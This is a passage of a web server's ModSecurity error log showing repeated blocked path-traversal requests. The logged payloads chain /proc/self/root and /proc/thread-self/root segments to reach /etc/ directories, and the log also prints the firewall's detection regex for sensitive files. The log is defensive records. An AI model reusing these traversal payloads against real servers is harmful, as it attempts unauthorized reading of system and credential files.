"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHgM_BxrYCr4hPDw8UCwAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:44:24.315678 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.241.46:38006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHyEr9dMAiw-8KANNv-gAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:44:30.942593 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:51272] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiHzrysWC90G-1nBrBtOAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:44:38.064742 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:37102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiH1v9ocpUE4ed4uDwbxAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:44:39.347253 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:45872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiH17ABkC4fWIHEf8EhPQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:44:45.878484 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.241.46:43318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiH3Ur9dMAiw-8KANNwBwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:45:08.419154 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:37962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiH9I6lpbStxTqkSkuO4gAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:45:09.756541 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:53466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiH9aQpVkWug9HeOt9Z9AAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:45:16.140085 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.244.31:33108] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiH_I6lpbStxTqkSkuO5AAAAko"]
[Mon Mar 16 19:45:19.659331 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:53476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiH__9ocpUE4ed4uDwb9wAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:45:44.121609 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:56078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIGNSswJuvopo3lOiJiQAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:45:45.320998 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.241.46:56042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIGdSswJuvopo3lOiJiwAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:46:43.873192 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:57844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIU1ajLEzk2WiQ-1063AAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:46:47.443684 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.241.46:57232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIV0r9dMAiw-8KANNwJQAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:47:16.949778 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.228.16:53638] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiIdI6lpbStxTqkSkuPRgAAAlM"]
[Mon Mar 16 19:47:37.108390 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:58472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIiaTCbgAP5jq5TehTBAAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:47:44.726304 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.243.203:52372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIkFajLEzk2WiQ-1068AAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:47:52.494062 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:52376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiImP9ocpUE4ed4uDwcRwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:47:53.810470 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.243.203:55896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiImaQpVkWug9HeOt9abQAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:48:31.199638 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:33310] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIv7ysWC90G-1nBrBtsQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:48:34.675412 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:34514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIwqQpVkWug9HeOt9afwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:48:37.096412 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:34528] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiIxbABkC4fWIHEf8EhrwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:51:00.644231 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:50968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiJVP9ocpUE4ed4uDwc3QAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:51:50.035015 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:59406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 